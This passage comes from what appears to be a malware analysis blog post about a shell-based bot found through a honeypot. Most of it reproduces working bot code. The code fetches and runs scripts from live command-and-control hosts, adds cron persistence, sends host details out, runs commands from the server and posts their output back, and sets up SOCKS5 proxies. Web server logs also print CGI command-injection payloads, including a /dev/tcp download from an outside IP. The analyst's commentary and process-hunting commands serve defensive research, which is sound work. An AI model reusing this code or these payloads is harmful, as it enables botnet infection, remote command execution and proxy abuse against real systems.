                ifaces=$(ip -4 -o a | cut -d ' ' -f 2,7 | cut -d '/' -f 1 | awk -F' ' '{print $1}' | tr '\n' ' ')
        else
                if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                        ifaces=$(ifconfig -a | grep flags | awk '{split($0,a,":"); print a[1]}' | tr '\n' ' ')
                fi
        fi
        for eth in $ifaces; do
                out=$(curl -s --interface $eth --connect-timeout 5 http://116.203.212.184/1010/online.php -u client:%@123-456@% 2> /dev/null)
                enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
                online=$(echo $out | awk '{split($0,a,","); print a[2]}')
                if [ "$enable" == "1" -a "$online" == "1" ]; then
                        echo "$eth" > .interface
                        break
                fi
        done
fi

if [ -f ".interface" ]; then
        CURL="curl --interface "$(cat .interface 2> /dev/null)
        DOM="116.203.212.184"
fi

out=$($CURL -s http://$DOM/1010/src.php -u client:%@123-456@% 2> /dev/null)
enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
base=$(echo $out | awk '{split($0,a,","); print a[2]}')
if [ "$enable" -eq "1" ]; then
        rm -rf .miniconda.sh .api .ipid .spid .cron.sh .src.sh; $CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode "s=$base" -o .src.sh 2> /dev/null && chmod +x .src.sh > /dev/null 2>&1
        sh .src.sh > /dev/null 2>&1 &
fi
rm -rf .install

There’s a lot of repetitious code here, but the upshot is that this “.install” script downloads an encoded script from http://116.203.212.184/1010/src.php and this becomes “.src.sh”. The “.install” script removes itself when done.

“.src.sh” is a simple bot written in shell, reproduced below. The first part of the script tries to install a “.cron.sh” script from hxxp://116.203.212.184/1010/cron.php for persistence. The main loop sleeps in 300-second intervals and then queries hxxp://116.203.212.184/1010/cmd.php for instructions.

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:$(pwd)/.api/.mnc/bin
kpid=$(tail -n 1 .spid 2> /dev/null)
printf %b "$(id -u)\\n$$" > .spid
kill -kill $kpid > /dev/null 2>&1
#echo $(ps -o ppid= $$) | xargs kill -9 > /dev/null 2>&1

ICURL="curl"
if [ ! "$(command -v curl 2> /dev/null)" ]; then
        ICURL="./.curl"
fi

CURL=$ICURL
DOM="rr.blueheaven.live"
if [ -f ".interface" ]; then
        CURL="$ICURL --interface "$(cat .interface 2> /dev/null)
        DOM="116.203.212.184"
fi

if [ ! -f ".cron.sh" ]; then
        out=$($CURL -s http://$DOM/1010/cron.php -u client:%@123-456@% 2> /dev/null)
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
        base=$(echo $out | awk '{split($0,a,","); print a[2]}')
        if [ "$enable" -eq "1" ]; then
                printf %b "$($CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode "s=$base" 2> /dev/null)" > .cron.sh 2> /dev/null && chmod +x .cron.sh > /dev/null 2>&1
        fi
fi

string="$(crontab -l 2> /dev/null)"
word="0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &"
if [ ! "${string#*$word}" != "$string" ]; then
        crcount=$(printf %s $(crontab -l 2> /dev/null) | wc -m)
        if [ "$crcount" -gt "0" ]; then
                printf %b "$(crontab -l 2> /dev/null)\\n0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                cat .cron | crontab || crontab .cron
        else
                if [ "$(id -u)" -eq "0" ]; then
                        printf %b "0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                        cat .cron | crontab || crontab .cron
                else
                        printf %b "PATH=/sbin:/bin:/usr/sbin:/usr/bin\\nHOME=$(pwd)\\nMAILTO=\"\"\\n0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                        cat .cron | crontab || crontab .cron
                fi
        fi
fi

psfunc()
{
        if [ "$(command -v ps 2> /dev/null)" ]; then
                ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null
        else
                if [ "$(command -v pgrep 2> /dev/null)" ]; then
                        pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null
                else
                        if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then
                                pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done
                        else
                                printf %b "0\n"
                        fi
                fi

        fi
}

timeout=""
if [ "$(command -v timeout 2> /dev/null)" ]; then
        timeout="timeout 15"
fi

if [ -f ".python" ]; then
        export PYTHONUSERBASE=$(cat .python 2> /dev/null)
fi

first=0
tstmp=0
while true
do
        slp=300
        out=$($timeout $CURL -s --data-urlencode "icid=$(cat .cid 2> /dev/null)" --data-urlencode "vuln=$(cat .pinfo 2> /dev/null)" --data-urlencode "ips=$(cat .api/ips.txt 2> /dev/null | wc -l 2> /dev/null)" --data-urlencode "prx=$(psfunc 'python -m pproxy')" --data-urlencode "mnc=$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" --data-urlencode "rm=$(($(a=$(echo $(cat /proc/meminfo 2> /dev/null) | grep MemTotal | cut -d' ' -f2); if [ "$a" -gt "0" 2> /dev/null ]; then echo $a;else echo 0;fi)/1024))" --data-urlencode "cr=$(nproc 2> /dev/null)" --data-urlencode "a=$(whoami 2> /dev/null)" --data-urlencode "o=$(cat /etc/*-release 2> /dev/null || uname -a)" -X POST http://$DOM/1010/cmd.php -u client:%@123-456@% 2> /dev/null || echo "0,0,0,0,0,0,0")
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
        cmd=$(echo $out | awk '{split($0,a,","); print a[2]}')
        tm=$(echo $out | awk '{split($0,a,","); print a[3]}')
        pv=$(echo $out | awk '{split($0,a,","); print a[4]}')
        prx=$(echo $out | awk '{split($0,a,","); print a[5]}')
        port=$(echo $out | awk '{split($0,a,","); print a[6]}')
        pass=$(echo $out | awk '{split($0,a,","); print a[7]}')
        if [ "$pv" -gt "0" ]; then
                printf %b "$pv\\n" > .cid
        fi
        if [ "$pv" -gt "0" -a "$first" -gt "0" ]; then
                if [ ! -f ".api/ips.txt" -a ! -f ".exec" ]; then
                        mkdir -p .api
                        ipsr=""
                        if [ "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'import netifaces;print(1)' 2> /dev/null)" -eq "1" ]; then
                                ipsr=$(export HOME=$(pwd)/.api; printf %b "import netifaces\\nfor iface in netifaces.interfaces():\\n\\tiface_details = netifaces.ifaddresses(iface)\\n\\tif netifaces.AF_INET in iface_details:\\n\\t\\tfor ip in iface_details[netifaces.AF_INET]:\\n\\t\\t\\tprint(ip['addr']+'/'+ip['netmask'])" | $HOME/.mnc/bin/python | grep -v 127.0.0.1 | tr '\\n' ' ')
                        else
                                if [ "$(command -v ip 2> /dev/null)" ]; then
                                        ipsr=$(ip addr | grep 'inet ' | awk -F' ' '{print $2}' | grep -v '127.0.0.1' | tr '\\n' ' ')
                                else
                                        if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                                                ipsr=$( ifconfig | grep 'inet ' |  awk '{split($0,a,"inet "); print a[2]}' | awk '{split($0,a," netmask"); print a[1]"/32"}' | grep -v '127.0.0.1' | tr '\\n' ' ')
                                        fi
                                fi
                        fi

                        if [ "$ipsr" != "" ]; then
                                for range in $ipsr; do
                                        ips=$($CURL -s http://$DOM/1010/ip.php -u client:%@123-456@% --data-urlencode "r=$range" 2> /dev/null)
                                        for ip1 in $ips; do

                                                out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                if [ "$enproxy" -eq "1" -a ! "$(grep "$wip" ".api/ips.txt" 2> /dev/null)" ]; then
                                                        printf %b "$ip1,$wip\\n" >> .api/ips.txt
                                                fi

                                        done
                                done
                        else
                                if [ "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" -eq "1" ]; then
                                        ip1=$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c "import socket;s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(('8.8.8.8', 80));print(s.getsockname()[0]);s.close()" 2> /dev/null)
                                        out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                        enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                        pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                        port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                        enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                        wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                        if [ "$enproxy" -eq "1" -a ! "$(grep "$wip" ".api/ips.txt" 2> /dev/null)" ]; then
                                                printf %b "$ip1,$wip\\n" >> .api/ips.txt
                                        fi
                                fi
                        fi
                else
                        if [ "$(($(date +%s)-$tstmp))" -ge "300" -a "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" -eq "1" ]; then
                                tstmp=$(date +%s)
                                case $prx in
                                        "0")
                                                pkill -9 -f "python -m pproxy" > /dev/null 2>&1
                                                ;;
                                        "1")
                                                pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                ips=$(cat .api/ips.txt | tr '\\n' ' ')
                                                for ip in $ips; do
                                                        ip1=$(echo $ip | awk '{split($0,a,","); print a[1]}')
                                                        if [ ! "$(psfunc "$ip1" 2> /dev/null)" ]; then

                                                                out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                                enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                                pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                                port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                                enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                                wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                                if [ "$enproxy" -eq "1" ]; then
                                                                        sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5+in://$pip:$port/@$ip1,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                                fi

                                                        fi
                                                done
                                                ;;
                                        "2")
                                                pkill -9 -f "python -m pproxy -l socks5\+in://" > /dev/null 2>&1
                                                if [ ! "$(psfunc "python -m pproxy -l socks5://:$port" 2> /dev/null)" ]; then
                                                        pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                        sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5://:$port/@in,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                fi
                                                ;;
                                        "3")
                                                pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                ips=$(cat .api/ips.txt | tr '\\n' ' ')
                                                for ip in $ips; do
                                                        ip1=$(echo $ip | awk '{split($0,a,","); print a[1]}')

                                                        out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                        enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                        pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                        port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                        enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                        wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                        if [ "$enproxy" -eq "1" -a "$enb" -eq "1" -a ! "$(psfunc "$ip1" 2> /dev/null)" ]; then
                                                                sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5+in://$pip:$port/@$ip1,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                        fi

                                                        if [ "$enproxy" -eq "1" -a "$enb" -eq "0" ]; then
                                                                pkill -9 -f "/@$ip1,#pproxy:" > /dev/null 2>&1
                                                        fi
                                                done
                                                ;;
                                esac
                        fi
                fi
        fi
        if [ "$tm" -eq "1" ]; then
                slp=1
        fi
        if [ "$enable" -eq "1" ]; then
                ex=$(sh -c "$cmd" 2>&1)
                $CURL -s --data-urlencode "icid=$(cat .cid 2> /dev/null)" --data-urlencode "reponse=$ex" -X POST http://$DOM/1010/post.php -u client:%@123-456@% 2> /dev/null
        fi
        if [ "$first" -eq "0" ]; then
                first=1
                sleep 1
        else
                sleep $slp
        fi
done
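That closes out the main loop. To summarize this tail end of the script: on each pass it inventories the local IP addresses (via the bundled Python interpreter's netifaces module, or ip, or ifconfig as fallbacks), registers the usable ones with the C2 via iprv.php, and then, roughly every 300 seconds and depending on the prx value returned, kills or (re)launches pproxy SOCKS5 listeners bound to those addresses. If the C2 sets enable=1, it also runs an arbitrary command and POSTs the output back to post.php. The resulting processes are easy to spot by command line. A minimal hunting sketch (GNU procps assumed):

# pproxy workers launched by this script carry distinctive arguments
pgrep -af 'python -m pproxy'

# the per-interface listeners also embed the bind IP and a '#pproxy:' password tag
ps ax -o pid,command | grep -a '#pproxy:' | grep -v grep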

Nov 27 and beyond – more shell code, less base64

In the mod_dumpio output from Nov 27 and beyond, the adversary abandons base64 encoding and simply sends unobfuscated shell payloads.

[Sat Nov 27 17:02:58.280572 2021]  A=|echo;printf vulnable
[Sun Nov 28 16:55:25.395499 2021]  A=|echo;echo vulnable
[Sun Nov 28 16:57:23.515598 2021]  A=|echo;a%3Dvulnable%3Becho%20%24a
[Sun Nov 28 16:57:23.786609 2021] [cgi:error]  /bin/sh: 1: a%3Dvulnable%3Becho%20%24a: not found: /bin/sh
[Sun Nov 28 16:57:24.018519 2021]  A=|echo;a%3Dvulnable%3Becho%20%24a
[Sun Nov 28 16:57:24.410051 2021] [cgi:error]  /bin/bash: line 1: a%3Dvulnable%3Becho%20%24a: command not found: /bin/bash
[Sun Nov 28 16:58:21.167696 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 16:58:21.208503 2021] [cgi:error] [pid 2632:tid 139978638071552] [client 116.202.187.77:34884] End of script output before headers: sh
[Sun Nov 28 16:58:21.467744 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 16:58:21.578078 2021] [cgi:error] [pid 2632:tid 139978780681984] [client 116.202.187.77:34914] End of script output before headers: bash
[Sun Nov 28 16:59:14.868614 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 16:59:14.899091 2021] [cgi:error] [pid 2632:tid 139978646464256] [client 116.202.187.77:35060] End of script output before headers: sh
[Sun Nov 28 16:59:15.119808 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 16:59:15.180240 2021] [cgi:error] [pid 2539:tid 139978327705344] [client 116.202.187.77:35080] End of script output before headers: bash
[Sun Nov 28 17:00:50.203622 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:01:46.202310 2021]  A=%7Cecho%3Becho+vulnable
[Sun Nov 28 17:01:46.243062 2021] [cgi:error] [pid 2632:tid 139978503853824] [client 116.202.187.77:35302] End of script output before headers: sh
[Sun Nov 28 17:01:46.514360 2021]  A=%7Cecho%3Becho+vulnable
[Sun Nov 28 17:01:46.584288 2021] [cgi:error] [pid 2539:tid 139978461923072] [client 116.202.187.77:35330] End of script output before headers: bash
[Sun Nov 28 17:02:38.990088 2021]  A=%7Cecho%253Becho%2520vulnable
[Sun Nov 28 17:02:39.030402 2021] [cgi:error] [pid 1693:tid 139978914899712] [client 116.202.187.77:35484] End of script output before headers: sh
[Sun Nov 28 17:02:39.281646 2021]  A=%7Cecho%253Becho%2520vulnable
[Sun Nov 28 17:02:39.362302 2021] [cgi:error] [pid 2632:tid 139978545817344] [client 116.202.187.77:35502] End of script output before headers: bash
[Sun Nov 28 17:03:13.639471 2021]  A%253D%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:13.699553 2021] [cgi:error]  /bin/sh: 1: : /bin/sh
[Sun Nov 28 17:03:13.699763 2021] [cgi:error]  A%253D%257Cecho%253Becho%2520vulnable: not found: /bin/sh
[Sun Nov 28 17:03:13.699802 2021] [cgi:error]  : /bin/sh
[Sun Nov 28 17:03:13.700009 2021] [cgi:error] [pid 2539:tid 139978478708480] [client 116.202.187.77:35642] End of script output before headers: sh
[Sun Nov 28 17:03:13.946964 2021]  A%253D%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:14.044809 2021] [cgi:error]  /bin/bash: line 1: A%253D%257Cecho%253Becho%2520vulnable: command not found: /bin/bash
[Sun Nov 28 17:03:14.064043 2021] [cgi:error] [pid 2632:tid 139978688427776] [client 116.202.187.77:35664] End of script output before headers: bash
[Sun Nov 28 17:03:42.715779 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:42.715930 2021] [cgi:error] [pid 2539:tid 139978310919936] [client 116.202.187.77:35814] End of script output before headers: sh
[Sun Nov 28 17:03:42.967866 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:43.048351 2021] [cgi:error] [pid 2632:tid 139978512246528] [client 116.202.187.77:35832] End of script output before headers: bash
[Sun Nov 28 17:04:04.539353 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 17:04:04.559961 2021] [cgi:error] [pid 2632:tid 139978537424640] [client 116.202.187.77:35978] End of script output before headers: sh
[Sun Nov 28 17:04:04.951514 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 17:04:05.213226 2021] [cgi:error] [pid 2632:tid 139978680035072] [client 116.202.187.77:36004] End of script output before headers: bash
[Sun Nov 28 17:09:32.521939 2021]  A=|echo;a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo vulnable; fi
[Sun Nov 28 17:32:12.024183 2021]  A=|echo;echo done
[Sun Nov 28 17:32:12.307559 2021]  A=|echo;echo done
[Sun Nov 28 17:32:48.782254 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:39:57.475699 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:40:38.123955 2021]  A=|echo;echo done;echo vulnable
[Sun Nov 28 17:42:19.620086 2021]  A=|echo;a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo done; fi;echo vulnable
[Sun Nov 28 17:44:07.177445 2021]  A=|echo;psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo 'psfunc'; fi; }; psfunc ;echo vulnable
[Sun Nov 28 17:44:49.689632 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo 'psfunc'; fi; }; psfunc;echo vulnable
[Sun Nov 28 17:46:15.189899 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo "$1"; fi; }; psfunc ps;echo vulnable
[Sun Nov 28 17:46:41.752037 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 17:48:14.564918 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" && "1" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 17:48:14.625501 2021] [cgi:error]  /bin/sh: 1: [: missing ]: /bin/sh
[Sun Nov 28 17:48:43.928639 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" -a "1" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 18:47:07.257086 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  }; if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 12345; else echo 00000; fi;echo vulnable
[Sun Nov 28 18:51:57.797516 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else 'True'; fi;echo vulnable
[Sun Nov 28 18:51:57.908907 2021] [cgi:error]  /bin/sh: 1: True: not found: /bin/sh
[Sun Nov 28 18:53:07.428691 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:55:09.609280 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:57:57.577951 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:58:32.809620 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:01:10.973735 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:02:17.249849 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v python 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:03:53.430460 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v lwp-download 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:04:45.663570 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v cp 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:05:40.047965 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:06:13.974648 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v php-cgi 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:11:51.013324 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:12:34.739533 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:14:05.110790 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:56:57.657280 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:00:34.841791 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(get http://94.130.181.216/test.txt 2> /dev/null)" -eq "11223344" 2> /dev/null ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:06:17.028826 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v timeout 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:08:15.277127 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(timeout 5 get http://94.130.181.216/test.txt 2> /dev/null)" -eq "11223344" 2> /dev/null -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:24:13.153432 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:25:06.378246 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:26:26.246581 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-; }; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
